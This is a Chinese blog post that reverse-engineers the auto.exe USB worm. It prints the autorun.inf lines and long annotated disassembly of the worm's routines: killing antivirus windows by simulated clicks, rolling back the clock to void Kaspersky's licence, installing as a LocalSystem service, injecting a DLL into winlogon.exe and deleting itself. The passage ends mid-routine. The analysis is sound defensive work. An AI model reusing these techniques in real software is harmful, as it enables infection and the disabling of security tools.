【作者】 cyclotron
【邮箱】 cyclotron at citiz.net
【主页】 http://cyclotron.yculblog.com
【背景】
很久以前就听说有利用 Kaspersky 的 License 弱点来对付杀软的病毒出现,因为冲浪比较小心,一直未曾谋面,然而近日上网却不慎屡次正面交锋,虽然在影子系统的护航下系统免受其害,但又忍不住好奇细细解剖了一番,权作笔记,以飨饱受其苦的网友。
病毒乍看起来没什么特别之处,主程序名为 auto.exe,通常会以隐藏文件的形式埋伏于每个盘的根目录下,辅以久负盛名的 autorun.inf,随着用户打开浏览器的操作悄悄渗入系统:
[AutoRun]
open=auto.exe
shellexecute=auto.exe
shell\Auto\command=auto.exe
脱掉主程序的 Upack 紧身衣,翻开代码故事的第一章:
0040216F _WinMain@16 proc near ; CODE XREF: start+12Fp
0040216F
0040216F var_41C = dword ptr -41Ch
0040216F lpVirusPathName = byte ptr -31Ch
0040216F var_VirusName = dword ptr -21Ch
0040216F var_11C = dword ptr -11Ch
0040216F ThreadId = dword ptr -1Ch
0040216F ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -18h
0040216F var_10 = dword ptr -10h
0040216F var_C = dword ptr -0Ch
0040216F dwSysOpVer = dword ptr -8
0040216F var_SysInfectFlag= dword ptr -4
0040216F arg_szCmdLine = dword ptr 10h
0040216F
0040216F push ebp
00402170 mov ebp, esp
00402172 sub esp, 41Ch
00402178 push ebx
00402179 push esi
0040217A mov esi, offset byte_410F20
0040217F push edi
00402180 mov ebx, offset dword_410D4C ; 接下去要清零的结构
00402185 push esi
00402186 push ebx
00402187 call sprintf ; 一连串sprintf把410D4C处的32h个dword清零初始化
…………………………
…………………………
004023FE call sprintf
00402403 push esi
00402404 push ebx
00402405 call sprintf
0040240A call GetSystemVersion ; 取得操作系统版本
0040240F mov [ebp+dwSysOpVer], eax
00402412 mov al, ds:byte_410F20
00402417 push 3Fh
00402419 mov byte ptr [ebp+var_VirusName], al
0040241F pop ecx
00402420 xor eax, eax
00402422 lea edi, [ebp+var_VirusName+1]
00402428 push esi
00402429 rep stosd
0040242B stosw
0040242D lea eax, [ebp+var_VirusName]
00402433 push eax
00402434 call strcpy ; 把自己的名字copy一下
00402439 lea eax, [ebp+var_VirusName]
0040243F push offset aAu ; "au"
00402444 push eax
00402445 call strcat
0040244A lea eax, [ebp+var_VirusName]
00402450 push offset aTo_e ; "to.e"
00402455 push eax
00402456 call strcat
0040245B add esp, 40h
0040245E lea eax, [ebp+var_VirusName]
00402464 push offset aXe ; "xe"
00402469 push eax
0040246A call strcat
【第一宗罪】 卡巴终结者
大多数病毒为躲避杀软的追击,往往使出各种手段隐匿自身代码和文件,RootKit、多态变形等种种层出不穷。然而我们这里的主角面对卡巴毫无惧色,主动出击剿灭卡巴的进程和窗口,意欲一除之而后快,堂堂卡巴面对如此对手,也只能玩起 Tom&Jerry 的游戏,至少在笔者的电脑上,卡巴剿之不及,auto.exe大有春风吹又生之势。
0040246F pop ecx
00402470 lea eax, [ebp+ThreadId]
00402473 pop ecx
00402474 push eax ; lpThreadId
00402475 xor eax, eax
00402477 push eax ; dwCreationFlags
00402478 push eax ; lpParameter
00402479 push offset lpAntiAVThread ; lpStartAddress
{
00402105
00402105
00402105 lpAntiAVThread proc near
00402106 push ebp
00402107 push esi
00402108 mov esi, ds:FindWindowExA
0040210E push edi
0040210F mov edi, ds:SendMessageA
00402115 xor ebx, ebx
00402117
00402117 loc_402117:
00402117 push ebx ; lParam
00402118 push offset EnumFunc ; lpEnumFunc
0040211D call ds:EnumWindows ; 穷举AV窗口
00402123 push 64h ; dwMilliseconds
00402125 call ds:Sleep
0040212B push offset byte_410BB0 ; LPCSTR
00402130 push offset a32770 ; LPCSTR
00402135 push ebx ; HWND
00402136 push ebx ; HWND
00402137 call esi ; FindWindowExA
00402139 cmp eax, ebx
0040213B jz short loc_402162
0040213D push offset aY ; LPCSTR
00402142 push offset aButton ; LPCSTR
00402147 push ebx ; HWND
00402148 push eax ; HWND
00402149 call esi ; FindWindowExA ; 找到"是(&Y)"按钮
0040214B push ebx ; lParam
0040214C mov ebp, eax
0040214E push 1 ; wParam
00402150 push WM_LBUTTONDOWN ; Msg
00402155 push ebp ; hWnd
00402156 call edi ; SendMessageA ; 发送鼠标点击消息
00402158 push ebx ; lParam
00402159 push ebx ; wParam
0040215A push WM_LBUTTONUP ; Msg
0040215F push ebp ; hWnd
00402160 call edi ; SendMessageA
00402162
00402162 loc_402162:
00402162 push 7D0h ; dwMilliseconds
00402167 call ds:Sleep
0040216D jmp short loc_402117 ; 反复执行守护线程
0040216D lpAntiAVThread endp ; 一旦发现AV启动立即主动出击剿灭之
}
0040247E push eax ; dwStackSize
0040247F push eax ; lpThreadAttributes
00402480 call ds:CreateThread ; 启动Anti-AV守护线程
00402486 mov edi, ds:Sleep
0040248C push 3E8h ; dwMilliseconds
00402491 call edi ; Sleep
00402493 and [ebp+var_SysInfectFlag], 0
00402497 push esi
00402758 push offset aDd33gsd2 ; "dd33gsd2"
0040275D call strcpy
00402762 lea eax, [ebp+var_11C]
00402768 push eax
00402769 lea eax, [ebp+var_11C]
0040276F push eax
00402770 call sub_402E93
00402775 lea eax, [ebp+var_11C]
0040277B push eax
0040277C push offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
00402781 call strcpy
00402786 push offset a_exe ; ".EXE"
0040278B push offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
00402790 call strcat ; 以VolumeSerialNumber命名exe
00402795 lea eax, [ebp+var_11C]
0040279B push eax
0040279C lea eax, [ebp+var_11C]
004027A2 push eax
004027A3 call sub_402E93
004027A8 add esp, 28h
004027AB push 1 ; dwMilliseconds
004027AD call edi ; Sleep
004027AF lea eax, [ebp+var_11C]
004027B5 push eax
004027B6 push offset aDd33gsd2_dll ; "dd33gsd2.dll"
004027BB call strcpy
004027C0 push offset a_dll ; ".DLL"
004027C5 push offset aDd33gsd2_dll ; "dd33gsd2.dll"
004027CA call strcat ; 以VolumeSerialNumber命名Dll
004027CF add esp, 10h
004027D2 lea eax, [ebp+var_11C]
004027D8 push eax
004027D9 push offset dword_410E1C
004027DE call ds:lstrcpy
【第二宗罪】 主动开启浏览器,放行autorun.inf
autorun.inf 并不是本文主角的专利,早在春秋战国时期就已经成为各路病毒愚弄菜菜的常备武器。然而在大家都是静候菜菜插入优盘,打开浏览器之时,auto.exe 却再次主动出击,迫不及待地打开浏览器,为 autorun.inf 开路。
0040281C lea eax, [ebp+lpVirusPathName]
00402822 push 104h ; nSize
00402827 push eax ; lpFilename
00402828 push 0 ; hModule
0040282A call ds:GetModuleFileNameA ; 取得病毒当前路径
00402830 test eax, eax
00402832 jnz short loc_40283C
00402834 push 1
00402836 pop eax
00402837 jmp loc_402C04
0040283C ; ----------------------------------------------------------------------------
0040283C
0040283C loc_40283C: ; CODE XREF: WinMain(x,x,x,x)+6C3j
0040283C lea eax, [ebp+var_VirusName]
00402842 push eax
00402843 lea eax, [ebp+lpVirusPathName]
00402849 push eax
0040284A call strstr ; 检索病毒文件字符串 auto.exe
0040284F pop ecx
00402850 test eax, eax
00402852 pop ecx
00402853 jz short loc_4028A7 ; emmm...
00402853 ; 老毒物没有在当前根目录下找到auto.exe
00402853 ; 说明已经感染到系统目录下了
00402855 lea eax, [ebp+lpVirusPathName]
0040285B push eax
0040285C call strlen
00402861 cmp eax, 2
00402864 pop ecx
00402865 jbe short loc_4028A7
00402867 movsx eax, [ebp+lpVirusPathName]
0040286E push eax
0040286F lea eax, [ebp+lpVirusPathName]
00402875 push offset aC ; "%c:\\"
0040287A push eax
0040287B mov [ebp+var_SysInfectFlag], 1
00402882 call sprintf ; 生成所在根目录字符串,如C:\
00402887 add esp, 0Ch
0040288A lea eax, [ebp+lpVirusPathName]
00402890 push 1 ; nShowCmd
00402892 push 0 ; lpDirectory
00402894 push eax ; lpParameters
00402895 push offset aExplorer_exe ; lpFile
0040289A push offset aOpen ; lpOperation
0040289F push 0 ; hwnd
004028A1 call ds:ShellExecuteA ; 用Explorer.exe打开该根目录
004028A1 ; 由于inf文件的存在此时会自动
004028A1 ; 执行auto.exe
【第三宗罪】 时光倒流——
这一招可是再次刺痛了卡巴的要害。。。(卡巴:auto 啊 auto,我俩本无瓜葛,你为何就如此针对我捏? >.<)
004028A7 loc_4028A7:
004028A7
004028A7 call FoolKaspersky
{
00401000 FoolKaspersky proc near
00401000
00401000 SystemTime = SYSTEMTIME ptr -10h
00401000
00401000 push ebp
00401001 mov ebp, esp
00401003 sub esp, 10h
00401006 push esi
…………………………
…………………………
00401298 push offset aAvp_exe ; "avp.exe"
0040129D call CountAVP ; 查找AVP相关的进程数
004012A2 add esp, 2Ch
004012A5 test eax, eax
004012A7 pop edi
004012A8 pop esi
004012A9 jg short loc_4012B0 ; 当进程数不为0时
004012A9 ; 修改系统时间使AVP License失效
004012AB or eax, 0FFFFFFFFh
004012AE leave
004012AF retn
004012B0 ; ----------------------------------------------------------------------------
004012B0
004012B0 loc_4012B0:
004012B0 lea eax, [ebp+SystemTime] ; 当进程数不为0时
004012B0 ; 修改系统时间使AVP License失效
004012B3 push eax ; lpSystemTime
004012B4 call ds:GetSystemTime
004012BA cmp [ebp+SystemTime.wYear], 7D5h
004012C0 jbe short loc_4012D2
004012C2 lea eax, [ebp+SystemTime]
004012C5 mov [ebp+SystemTime.wYear], 7D5h
004012CB push eax ; lpSystemTime
004012CC call ds:SetSystemTime
004012D2
004012D2 loc_4012D2:
004012D2 push 4E20h ; dwMilliseconds
004012D7 call ds:Sleep
004012DD push 1
004012DF pop eax
004012E0 leave
004012E1 retn
004012E1 FoolKaspersky endp
}
004028AC cmp [ebp+dwSysOpVer], VER_PLATFORM_WIN32_NT
004028B0 jnz loc_402BEF ; 如果是Win9x,下面的部分就可以幸免了
004028B6 push 0FFh
004028BB lea eax, [ebp+var_41C]
004028C1 push 0
004028C3 push eax
004028C4 call memset ; 填零初始化
【第四宗罪】 伪装系统服务派发员
auto.exe 不是街头混混,出手如此大气,足见其志在高远。只可惜笔者这块内容生疏,回头恶补 MSDN 再奉上。。。
004028BB lea eax, [ebp+var_41C]
004028C1 push 0
004028C3 push eax
004028C4 call memset ; 填零初始化
004028C9 add esp, 0Ch
004028CC lea eax, [ebp+var_41C]
004028D2 push offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
004028D7 push eax
004028D8 call ds:lstrcpy ; 复制刚才根据VolumeSerialNumber
004028D8 ; 生成的[VolumeSerialNumber].exe名称
004028DE lea eax, [ebp+var_41C]
004028E4 push 1
004028E6 push eax
004028E7 call CopySelfToSysDir_As_VSNexe ;
004028E7 ; 把自身以[VolumeSerialNumber].exe
004028E7 ; 为名复制到系统目录
004028EC push offset aK ; "-k"
004028F1 push [ebp+arg_szCmdLine]
004028F4 call strstr ; 是否存在命令行参数 -k?
004028F9 add esp, 10h
004028FC test eax, eax
004028FE jz loc_402BB1
00402904 xor edi, edi ; 没有,接下去把系统目录下的
00402904 ; 病毒体注册为服务
00402906 push esi
00402907 push ebx
00402908 mov [ebp+ServiceStartTable.lpServiceName], offset aDd33gsd2_1 ; "dd33gsd2"
0040290F mov [ebp+ServiceStartTable.lpServiceProc], offset VirusServiceProc
{
004019D1 VirusServiceProc proc near
004019D1
004019D1 ThreadId = dword ptr -108h
004019D1 ServiceName = byte ptr -104h
…………………………
…………………………
00401CA5 push 40h
00401CA7 mov [esp+144h+ServiceName], al
00401CAB pop ecx
00401CAC xor eax, eax
00401CAE lea edi, [esp+3Dh]
00401CB2 rep stosd
00401CB4 stosw
00401CB6 stosb
00401CB7 lea eax, [esp+140h+ServiceName]
00401CBB push offset aDd33gsd2_1 ; "dd33gsd2"
00401CC0 push eax
00401CC1 call strcpy
00401CC6 add esp, 30h
00401CC9 lea eax, [esp+118h+ServiceName]
00401CCD push offset HandlerProc ; lpHandlerProc
00401CD2 push eax ; lpServiceName
00401CD3 call ds:RegisterServiceCtrlHandlerA
00401CD9 mov ds:hServiceStatus, eax
00401CDE call ds:GetLastError
00401CE4 mov eax, ds:hServiceStatus
00401CE9 cmp eax, ebp
00401CEB jz loc_40200D
00401CF1 mov edi, ds:SetServiceStatus
00401CF7 push offset stru_410D30 ; lpServiceStatus
00401CFC push eax ; hServiceStatus
00401CFD mov ds:stru_410D30.dwCurrentState, 4
00401D07 call edi ; SetServiceStatus
…………………………
…………………………
00401F8F lea eax, [esp+118h+ThreadId]
00401F93 push eax ; lpThreadId
00401F94 push ebp ; dwCreationFlags
00401F95 push ebp ; lpParameter
00401F96 push offset InjectDll2Winlogon ; lpStartAddress
00401F9B push ebp ; dwStackSize
00401F9C push ebp ; lpThreadAttributes
00401F9D call ds:CreateThread
00401FA3 cmp ds:dword_410F1C, ebp
00401FA9 mov esi, ds:Sleep
00401FAF push 1
00401FB1 pop ebx
00401FB2 jnz short loc_401FC6
00401FB4
00401FB4 loc_401FB4:
00401FB4 push ebx ; dwMilliseconds
00401FB5 call esi ; Sleep
00401FB7 push 12Ch ; dwMilliseconds
00401FBC call esi ; Sleep
00401FBE cmp ds:dword_410F1C, ebp
00401FC4 jz short loc_401FB4
00401FC6
00401FC6 loc_401FC6:
00401FC6 cmp ds:stru_410D30.dwCurrentState, 4
00401FCD jnz short loc_40200D
00401FCF push offset stru_410D30 ; lpServiceStatus
00401FD4 mov ds:stru_410D30.dwServiceType, 110h
00401FDE push ds:hServiceStatus ; hServiceStatus
00401FE4 mov ds:stru_410D30.dwCurrentState, ebx
00401FEA mov ds:stru_410D30.dwControlsAccepted, ebx
00401FF0 mov ds:stru_410D30.dwWin32ExitCode, ebp
00401FF6 mov ds:stru_410D30.dwCheckPoint, ebp
00401FFC mov ds:stru_410D30.dwWaitHint, ebp
00402002 call edi ; SetServiceStatus
00402004 push 7530h ; dwMilliseconds
00402009 call esi ; Sleep
0040200B jmp short loc_401FC6
0040200D ; ----------------------------------------------------------------------------
0040200D
0040200D loc_40200D:
0040200D pop edi
0040200E pop esi
0040200F pop ebp
00402010 pop ebx
00402011 add esp, 108h
00402017 retn
00402017 VirusServiceProc endp
}
00402916 mov [ebp+var_10], edi
00402919 mov [ebp+var_C], edi
…………………………
…………………………
00402BA0 lea eax, [ebp+ServiceStartTable]
00402BA3 push eax ; lpServiceStartTable
00402BA4 call ds:StartServiceCtrlDispatcherA ; 注册病毒线程为ServiceDispatcher
00402BAA neg eax
00402BAC sbb eax, eax
00402BAE inc eax
00402BAF jmp short loc_402C04
【第五宗罪】 注入系统进程,Hook 无处不在
在上面的 ServiceDispatcher 中,最辣手的一招绝非伪装派遣本身,而是隐含在其中的远程代码注入,auto.exe 的病毒体中附带了一个真正用来干坏事的Dll,在伪装派遣的过程中以卷标号命名,被释放到系统目录下,当然同时被释放过去的还有病毒体本身,一搭一挡构成了下面注册系统服务的文件。在清除的过程中,最难对付的非该Dll莫属。一旦被注册到系统服务,该Dll就会注入到大量的系统进程中,随时监视和刷新对它不利的操作,在该Dll被释放之前,任何对其注册表项的修改都会遭到即时反攻,令对手除之而不能。
0040183D ; DWORD __stdcall InjectDll2Winlogon(LPVOID)
0040183D InjectDll2Winlogon proc near
0040183D
0040183D var_szExeName = dword ptr -308h
0040183D var_szSysDir = byte ptr -208h
0040183D var_szDllName = byte ptr -108h
0040183D NumberOfBytesWritten= dword ptr -8
0040183D var_OpSysVer = dword ptr -4
0040183D
0040183D push ebp
0040183E mov ebp, esp
00401840 sub esp, 308h
00401846 push esi
00401847 push edi
00401848 call GetSystemVersion
0040184D mov esi, ds:GetSystemDirectoryA
00401853 mov [ebp+var_OpSysVer], eax
00401856 mov edi, 0FFh
0040185B lea eax, [ebp+var_szSysDir]
00401861 push edi ; uSize
00401862 push eax ; lpBuffer
00401863 call esi ; GetSystemDirectoryA
00401865 test eax, eax
00401867 jz loc_401974
0040186D lea eax, [ebp+var_szSysDir]
00401873 push edi ; uSize
00401874 push eax ; lpBuffer
00401875 call esi ; GetSystemDirectoryA
00401877 test eax, eax
00401879 jz loc_401974
0040187F lea eax, [ebp+var_szSysDir]
00401885 push eax
00401886 lea eax, [ebp+var_szDllName]
0040188C push eax
0040188D call strcpy
00401892 mov esi, offset asc_410B74 ; "\\"
00401897 lea eax, [ebp+var_szDllName]
0040189D push esi
0040189E push eax
0040189F call strcat
004018A4 lea eax, [ebp+var_szDllName]
004018AA push offset aDd33gsd2_dll ; "dd33gsd2.dll"
004018AF push eax
004018B0 call strcat
004018B5 add esp, 18h
004018B8 lea eax, [ebp+var_szSysDir]
004018BE push eax
004018BF lea eax, [ebp+var_szExeName]
004018C5 push eax
004018C6 call ds:lstrcpy
004018CC lea eax, [ebp+var_szExeName]
004018D2 push esi
004018D3 push eax
004018D4 call strcat
004018D9 lea eax, [ebp+var_szExeName]
004018DF push offset aDd33gsd2_exe ; "dd33gsd2.exe"
004018E4 push eax
004018E5 call strcat
004018EA add esp, 10h
004018ED xor edi, edi
004018EF lea eax, [ebp+var_szDllName]
004018F5 push edi ; hTemplateFile
004018F6 push edi ; dwFlagsAndAttributes
004018F7 push 2 ; dwCreationDisposition
004018F9 push edi ; lpSecurityAttributes
004018FA push edi ; dwShareMode
004018FB push 40000000h ; dwDesiredAccess
00401900 push eax ; lpFileName
00401901 call ds:CreateFileA
00401907 mov esi, eax
00401909 cmp esi, 0FFFFFFFFh
0040190C jz short loc_401924
0040190E lea eax, [ebp+NumberOfBytesWritten]
00401911 push edi ; lpOverlapped
00401912 push eax ; lpNumberOfBytesWritten
00401913 push 0B000h ; nNumberOfBytesToWrite
00401918 push offset byte_405010 ; lpBuffer
0040191D push esi ; hFile
0040191E call ds:WriteFile ; 建立[VolumeSerialNumber].dll
00401924
00401924 loc_401924:
00401924 push ebx
00401925 push esi ; hObject
00401926 call ds:CloseHandle
0040192C cmp [ebp+var_OpSysVer], VER_PLATFORM_WIN32_NT
00401930 mov esi, ds:Sleep
00401936 push 1
00401938 mov edi, 0BB8h
0040193D pop ebx
0040193E jnz short loc_40196A
00401940 push 0
00401942 push offset aWinlogon_exe ; "winlogon.exe"
00401947 call FindSpecificProcess ; 查找winlogon.exe进程
0040194C pop ecx
0040194D test eax, eax
0040194F pop ecx
00401950 jz short loc_401961
00401952 push eax
00401953 lea eax, [ebp+var_szDllName]
00401959 push eax
0040195A call Inject_winlogon_exe ; 将[VolumeSerialNumber].dll注入winlogon.exe
0040195F pop ecx
00401960 pop ecx
00401961
00401961 loc_401961:
00401961 push edi ; dwMilliseconds
00401962 call esi ; Sleep
00401964 mov ds:dword_410F1C, ebx
0040196A
0040196A loc_40196A:
0040196A push edi ; dwMilliseconds
0040196B call esi ; Sleep
0040196D mov ds:dword_410F1C, ebx
00401973 pop ebx
00401974
00401974 loc_401974:
00401974 pop edi
00401975 pop esi
00401976 leave
00401977 retn
00401977 InjectDll2Winlogon endp
【第六宗罪】 注册系统服务,启动无影无踪
前面说道 auto.exe 志存高远,早已放弃同行广泛采用的自启动,而改用系统服务的方式深深侵入到系统的脊髓,加上远程注入Dll全程护航,普通的清除方式已经难以奏效。在被感染的系统中,系统服务列表中会增加一项以卷标号命名的自启动服务,其支持者恰为前面释放到系统目录的病毒体和Dll。
00402BB1
00402BB1 loc_402BB1:
00402BB1 lea eax, [ebp+var_41C]
00402BB7 push offset aK_0 ; " -k"
00402BBC push eax
00402BBD call ds:lstrcat
00402BC3 push 1
00402BC5 push 0BB8h
00402BCA lea eax, [ebp+var_41C]
00402BD0 push offset dword_410E1C
00402BD5 push eax
00402BD6 mov esi, offset aDd33gsd2_1 ; "dd33gsd2"
00402BDB push offset aDd33gsd2_0 ; "dd33gsd2"
00402BE0 push esi
00402BE1 call RegisterVirusService ; 注册病毒服务
{
00402F83 RegisterVirusService proc near
00402F83
00402F83 var_110 = dword ptr -110h
00402F83 pcbBytesNeeded = dword ptr -10h
00402F83 var_C = dword ptr -0Ch
00402F83 hSCManager = dword ptr -8
00402F83 hSCObject = dword ptr -4
00402F83 lpServiceName = dword ptr 8
00402F83 lpDisplayName = dword ptr 0Ch
00402F83 lpBinaryPathName= dword ptr 10h
00402F83 arg_C = dword ptr 14h
00402F83 dwMilliseconds = dword ptr 18h
00402F83 arg_14 = dword ptr 1Ch
00402F83
00402F83 push ebp
00402F84 mov ebp, esp
00402F86 sub esp, 110h
00402F8C mov al, ds:byte_410F20
00402F91 push ebx
00402F92 push esi
00402F93 push edi
00402F94 push 3Fh
00402F96 mov byte ptr [ebp+var_110], al
00402F9C pop ecx
00402F9D xor eax, eax
00402F9F lea edi, [ebp+var_110+1]
00402FA5 push offset aSystemCurr ; "SYSTEM\\Curr"
00402FAA rep stosd
00402FAC stosw
00402FAE lea eax, [ebp+var_110]
00402FB4 push eax
00402FB5 call ds:lstrcpy
00402FBB mov esi, ds:lstrcat
00402FC1 lea eax, [ebp+var_110]
00402FC7 push offset aEntcontrolse ; "entControlSe"
00402FCC push eax
00402FCD call esi ; lstrcat
00402FCF lea eax, [ebp+var_110]
00402FD5 push offset aTServices ; "t\\Services\\"
00402FDA push eax
00402FDB call esi ; lstrcat
00402FDD push [ebp+lpServiceName]
00402FE0 lea eax, [ebp+var_110]
00402FE6 push eax
00402FE7 call esi ; lstrcat
00402FE9 xor edi, edi
00402FEB mov ebx, 0F01FFh
00402FF0 mov esi, offset aDescription ; "Description"
00402FF5
00402FF5 loc_402FF5:
00402FF5 push 0F003Fh ; dwDesiredAccess
00402FFA push edi ; lpDatabaseName
00402FFB push edi ; lpMachineName
00402FFC call ds:OpenSCManagerA ; Establish a connection to the service
00402FFC ; control manager on the specified computer
00402FFC ; and opens the specified database
00403002 cmp eax, edi
00403004 mov [ebp+hSCManager], eax
00403007 jz loc_4030B9
0040300D push ebx ; dwDesiredAccess
0040300E push [ebp+lpServiceName] ; lpServiceName
00403011 push eax ; hSCManager
00403012 call ds:OpenServiceA
00403018 cmp eax, edi
0040301A mov [ebp+hSCObject], eax
0040301D jz short loc_403088
0040301F push 400h ; uBytes
00403024 push 40h ; uFlags
00403026 call ds:LocalAlloc
0040302C cmp eax, edi
0040302E mov [ebp+var_C], eax
00403031 jz short loc_403088
00403033 lea ecx, [ebp+pcbBytesNeeded]
00403036 push ecx ; pcbBytesNeeded
00403037 push 400h ; cbBufSize
0040303C push eax ; lpServiceConfig
0040303D push [ebp+hSCObject] ; hService
00403040 call ds:QueryServiceConfigA
00403046 test eax, eax
00403048 jz short loc_403088
0040304A mov eax, [ebp+var_C]
0040304D cmp dword ptr [eax+4], 2
00403051 jnz short loc_40305B
00403053 mov eax, [eax+0Ch]
00403056 cmp eax, [ebp+lpBinaryPathName]
00403059 jz short loc_403088
0040305B
0040305B loc_40305B:
0040305B push [ebp+lpDisplayName] ; lpDisplayName
0040305E push edi ; lpPassword
0040305F push edi ; lpServiceStartName
00403060 push edi ; lpDependencies
00403061 push edi ; lpdwTagId
00403062 push edi ; lpLoadOrderGroup
00403063 push [ebp+lpBinaryPathName] ; lpBinaryPathName
00403066 push 0FFFFFFFFh ; dwErrorControl
00403068 push 2 ; dwStartType
0040306A push 10h ; dwServiceType
0040306C push [ebp+hSCObject] ; hService
0040306F call ds:ChangeServiceConfigA
00403075 push [ebp+arg_C]
00403078 lea eax, [ebp+var_110]
0040307E push esi
0040307F push eax
00403080 call SetVirusServiceKeys
00403085 add esp, 0Ch
00403088
00403088 loc_403088:
00403088 push edi ; lpPassword
00403089 push edi ; lpServiceStartName
0040308A push edi ; lpDependencies
0040308B push edi ; lpdwTagId
0040308C push edi ; lpLoadOrderGroup
0040308D push [ebp+lpBinaryPathName] ; lpBinaryPathName
00403090 push 1 ; dwErrorControl
00403092 push 2 ; dwStartType
00403094 push 10h ; dwServiceType
00403096 push ebx ; dwDesiredAccess
00403097 push [ebp+lpDisplayName] ; lpDisplayName
0040309A push [ebp+lpServiceName] ; lpServiceName
0040309D push [ebp+hSCManager] ; hSCManager
004030A0 call ds:CreateServiceA
004030A6 push [ebp+arg_C]
004030A9 lea eax, [ebp+var_110]
004030AF push esi
004030B0 push eax
004030B1 call SetVirusServiceKeys
004030B6 add esp, 0Ch
004030B9
004030B9 loc_4030B9:
004030B9 push [ebp+hSCObject] ; hSCObject
004030BC call ds:CloseServiceHandle
004030C2 push 1 ; dwMilliseconds
004030C4 call ds:Sleep
004030CA push [ebp+lpServiceName]
004030CD lea eax, [ebp+var_110]
004030D3 push offset aDisplayname ; "DisplayName"
004030D8 push eax
004030D9 call SetVirusServiceKeys
004030DE push [ebp+arg_C]
004030E1 lea eax, [ebp+var_110]
004030E7 push esi
004030E8 push eax
004030E9 call SetVirusServiceKeys
004030EE push 1
004030F0 lea eax, [ebp+var_110]
004030F6 push offset aErrorcontrol ; "ErrorControl"
004030FB push eax
004030FC call sub_402DC6
00403101 push [ebp+lpBinaryPathName]
00403104 lea eax, [ebp+var_110]
0040310A push offset aImagepath ; "ImagePath"
0040310F push eax
00403110 call SetVirusServiceKeys
00403115 push offset aLocalsystem ; "LocalSystem"
0040311A lea eax, [ebp+var_110]
00403120 push offset aObjectname ; "ObjectName"
00403125 push eax
00403126 call SetVirusServiceKeys
0040312B push 2
0040312D lea eax, [ebp+var_110]
00403133 push offset aStart ; "Start"
00403138 push eax
00403139 call sub_402DC6
0040313E add esp, 48h
00403141 lea eax, [ebp+var_110]
00403147 push 10h
00403149 push offset aType ; "Type"
0040314E push eax
0040314F call sub_402DC6
00403154 add esp, 0Ch
00403157 push 1
00403159 pop eax
0040315A cmp [ebp+arg_14], eax
0040315D jz short loc_40316D
0040315F push [ebp+dwMilliseconds] ; dwMilliseconds
00403162 call ds:Sleep
00403168 jmp loc_402FF5
0040316D ; ----------------------------------------------------------------------------
0040316D
0040316D loc_40316D:
0040316D pop edi
0040316E pop esi
0040316F pop ebx
00403170 leave
00403171 retn
00403171 RegisterVirusService endp
}
00402BE6 push esi
00402BE7 call StartVirusService ; 启动病毒服务
{
00402F3C StartVirusService proc near
00402F3C
00402F3C lpServiceName = dword ptr 0Ch
00402F3C
00402F3C push esi
00402F3D push edi
00402F3E push 0F003Fh ; dwDesiredAccess
00402F43 push 0 ; lpDatabaseName
00402F45 push 0 ; lpMachineName
00402F47 call ds:OpenSCManagerA ; Establish a connection to the service
00402F47 ; control manager on the specified computer
00402F47 ; and opens the specified database
00402F4D mov edi, eax
00402F4F test edi, edi
00402F51 jz short loc_402F80
00402F53 push 0F01FFh ; dwDesiredAccess
00402F58 push [esp+4+lpServiceName] ; lpServiceName
00402F5C push edi ; hSCManager
00402F5D call ds:OpenServiceA
00402F63 mov esi, eax
00402F65 test esi, esi
00402F67 jz short loc_402F80
00402F69 push 0 ; lpServiceArgVectors
00402F6B push 0 ; dwNumServiceArgs
00402F6D push esi ; hService
00402F6E call ds:StartServiceA
00402F74 push esi ; hSCObject
00402F75 mov esi, ds:CloseServiceHandle
00402F7B call esi ; CloseServiceHandle
00402F7D push edi ; hSCObject
00402F7E call esi ; CloseServiceHandle
00402F80
00402F80 loc_402F80:
00402F80
00402F80 pop edi
00402F81 pop esi
00402F82 retn
00402F82 StartVirusService endp
}
00402BEC add esp, 1Ch
【第七宗罪】 毁尸灭迹
不要以为 auto.exe 是个头脑简单的家伙,它干了坏事以后也是要消灭罪证的。想知道如何删除正在运行的程序文件吗?仔细看看下面的代码:
00402BEF cmp [ebp+var_SysInfectFlag], 0
00402BF3 jnz short loc_402BFA
00402BF5 call Del_InfectingHost ; 如果当前运行病毒实例不是系统目录下的实例
00402BF5 ; 则在运行完毕以后删除该实例
{
004012E2 Del_InfectingHost proc near
004012E2
004012E2 var_szDelCmdLine= byte ptr -408h
004012E2 var_szFilename = byte ptr -308h
004012E2 var_szSysDirName= byte ptr -208h
004012E2 Buffer = dword ptr -108h
004012E2 hObject = dword ptr -8
004012E2 NumberOfBytesWritten= dword ptr -4
004012E2
004012E2 push ebp
004012E3 mov ebp, esp
004012E5 sub esp, 408h
004012EB push ebx
004012EC push esi
004012ED push edi
004012EE mov edi, offset byte_410F20
…………………………
…………………………
00401577 lea eax, [ebp+var_szFilename]
0040157D push 0FFh ; nSize
00401582 push eax ; lpFilename
00401583 push ebx ; hModule
00401584 call ds:GetModuleFileNameA
0040158A lea eax, [ebp+var_szSysDirName]
00401590 push 0FEh ; uSize
00401595 push eax ; lpBuffer
00401596 call ds:GetSystemDirectoryA
0040159C test eax, eax
0040159E jnz short loc_4015A8
004015A0 or eax, 0FFFFFFFFh
004015A3 jmp loc_401838
004015A8 ; ----------------------------------------------------------------------------
004015A8
004015A8 loc_4015A8:
004015A8 lea eax, [ebp+var_szSysDirName]
004015AE push offset asc_410B74 ; "\\"
004015B3 push eax
004015B4 call strcat
004015B9 mov ebx, ds:lstrcpy
004015BF pop ecx
004015C0 pop ecx
004015C1 lea eax, [ebp+var_szSysDirName]
004015C7 push eax
004015C8 lea eax, [ebp+var_szDelCmdLine]
004015CE push eax
004015CF call ebx ; lstrcpy
004015D1 lea eax, [ebp+var_szDelCmdLine]
004015D7 push offset aDel_bat ; "del.bat"
004015DC push eax
004015DD call ds:lstrcat
004015E3 lea eax, [ebp+var_szSysDirName]
004015E9 push offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
004015EE push eax
004015EF call strcat
004015F4 mov esi, ds:CharUpperA
004015FA pop ecx
004015FB pop ecx
004015FC lea eax, [ebp+var_szSysDirName]
00401602 push eax ; lpsz
00401603 call esi ; CharUpperA
00401605 push eax
00401606 lea eax, [ebp+var_szFilename]
0040160C push eax ; lpsz
0040160D call esi ; CharUpperA
0040160F push eax
00401610 call ds:lstrcmp ; 比较当前目录是否为系统目录?
00401616 push 1
00401618 test eax, eax
0040161A pop edi
0040161B jz loc_401836 ; 是系统目录则放弃接下去的清除操作
00401621 mov esi, ds:Sleep
00401627 push edi ; dwMilliseconds
00401628 call esi ; Sleep
